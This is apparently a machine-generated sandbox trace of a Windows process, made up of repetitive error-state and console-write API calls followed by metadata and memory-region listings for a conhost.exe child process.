GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.724] SetLastError (dwErrCode=0x0) [0278.724] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.725] SetLastError (dwErrCode=0x0) [0278.725] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.726] GetLastError () returned 0x0 [0278.726] SetLastError (dwErrCode=0x0) [0278.727] GetLastError () returned 0x0 [0278.727] SetLastError (dwErrCode=0x0) [0278.727] GetLastError () returned 0x0 [0278.727] SetLastError (dwErrCode=0x0) [0278.727] GetLastError () returned 0x0 [0278.727] SetLastError (dwErrCode=0x0) [0278.727] GetLastError () returned 0x0 [0278.727] SetLastError (dwErrCode=0x0) [0278.727] GetLastError () returned 0x0 [0278.727] SetLastError (dwErrCode=0x0) [0278.727] GetLastError () returned 0x0 [0278.727] SetLastError (dwErrCode=0x0) [0278.727] GetLastError () returned 0x0 [0278.727] SetLastError (dwErrCode=0x0) [0278.727] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0278.822] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x65, lpOverlapped=0x0) returned 1 [0278.882] GetLastError () returned 0x0 [0278.882] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.883] GetLastError () returned 0x0 [0278.883] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.884] SetLastError (dwErrCode=0x0) [0278.884] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetLastError () returned 0x0 [0278.885] SetLastError (dwErrCode=0x0) [0278.885] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0278.905] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x2c, lpOverlapped=0x0) returned 1 [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.064] SetLastError (dwErrCode=0x0) [0279.064] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.065] SetLastError (dwErrCode=0x0) [0279.065] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetLastError () returned 0x0 [0279.066] SetLastError (dwErrCode=0x0) [0279.066] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.339] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x3a, lpOverlapped=0x0) returned 1 [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.525] GetLastError () returned 0x0 [0280.525] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] SetLastError (dwErrCode=0x0) [0280.526] GetLastError () returned 0x0 [0280.526] GetLastError () returned 0x0 [0280.526] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.576] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x8a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x8a, lpOverlapped=0x0) returned 1 [0280.597] GetLastError () returned 0x0 [0280.598] GetLastError () returned 0x0 [0280.598] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.648] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x55, lpOverlapped=0x0) returned 1 [0280.658] GetLastError () returned 0x0 [0280.658] GetLastError () returned 0x0 [0280.658] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.677] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x3b, lpOverlapped=0x0) returned 1 [0280.684] GetLastError () returned 0x0 [0280.684] GetLastError () returned 0x0 [0280.684] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.686] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x38, lpOverlapped=0x0) returned 1 [0280.692] GetLastError () returned 0x0 [0280.692] GetLastError () returned 0x0 [0280.692] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.693] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x45, lpOverlapped=0x0) returned 1 [0280.705] GetLastError () returned 0x0 [0280.705] GetLastError () returned 0x0 [0280.706] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.739] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x4a, lpOverlapped=0x0) returned 1 [0280.758] GetLastError () returned 0x0 [0280.758] GetLastError () returned 0x0 [0280.758] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.779] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x4e, lpOverlapped=0x0) returned 1 [0280.794] GetLastError () returned 0x0 [0280.794] GetLastError () returned 0x0 [0280.794] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.888] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x48, lpOverlapped=0x0) returned 1 [0280.898] GetLastError () returned 0x0 [0280.898] GetLastError () returned 0x0 [0280.898] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0280.900] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x31, lpOverlapped=0x0) returned 1 [0280.923] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe58 | out: phModule=0x14fe58) returned 0 [0280.923] ExitProcess (uExitCode=0x1) Thread: id = 905 os_tid = 0x224 Process: id = "107" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3a752000" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "105" os_parent_pid = "0xf4c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7679 start_va = 0x7f88c000 end_va = 0x7f88cfff entry_point = 0x0 region_type = private name = "private_0x000000007f88c000" filename = "" Region: id = 7680 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7681 start_va = 0x6ef5020000 end_va = 0x6ef503ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5020000" filename = "" Region: id = 7682 start_va = 0x6ef5040000 end_va = 0x6ef5053fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5040000" filename = "" Region: id = 7683 start_va = 0x6ef5060000 end_va = 0x6ef509ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5060000" filename = "" Region: id = 7684 start_va = 0x7df5ff430000 end_va = 0x7ff5ff42ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff430000" filename = "" Region: id = 7685 start_va = 0x7ff7fd390000 end_va = 0x7ff7fd3b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd390000" filename = "" Region: id = 7686 start_va = 0x7ff7fd3b9000 end_va = 0x7ff7fd3b9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd3b9000" filename = "" Region: id = 7687 start_va = 0x7ff7fd3be000 end_va = 0x7ff7fd3bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd3be000" filename = "" Region: id = 7688 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7689 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7690 start_va = 0x6ef5020000 end_va = 0x6ef502ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef5020000" filename = "" Region: id = 7691 start_va = 0x6ef5140000 end_va = 0x6ef523ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5140000" filename = "" Region: id = 7692 start_va = 0x6ef5240000 end_va = 0x6ef52fdfff entry_point = 0x6ef5240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7693 start_va = 0x7ff7fd290000 end_va = 0x7ff7fd38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd290000" filename = "" Region: id = 7694 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7695 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7696 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7697 start_va = 0x6ef50a0000 end_va = 0x6ef50dffff entry_point = 0x0 region_type = private name = "private_0x0000006ef50a0000" filename = "" Region: id = 7698 start_va = 0x6ef5300000 end_va = 0x6ef548ffff entry_point = 0x0 region_type = private name = "private_0x0000006ef5300000" filename = "" Region: id = 7699 start_va = 0x7ff7fd3bc000 end_va = 0x7ff7fd3bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd3bc000" filename = "" Region: id = 7700 start_va = 0x6ef5030000 end_va = 0x6ef5036fff entry_point = 0x0 region_type = private name = "private_0x0000006ef5030000" filename = "" Region: id = 7701 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7702 start_va = 0x6ef50e0000 end_va = 0x6ef50e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ef50e0000" filename = "" Region: id = 7703 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7704 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7705 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7706 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7707 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7708 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7709 start_va = 0x6ef50f0000 end_va = 0x6ef50f6fff entry_point = 0x0 region_type = private name = "private_0x0000006ef50f0000" filename = "" 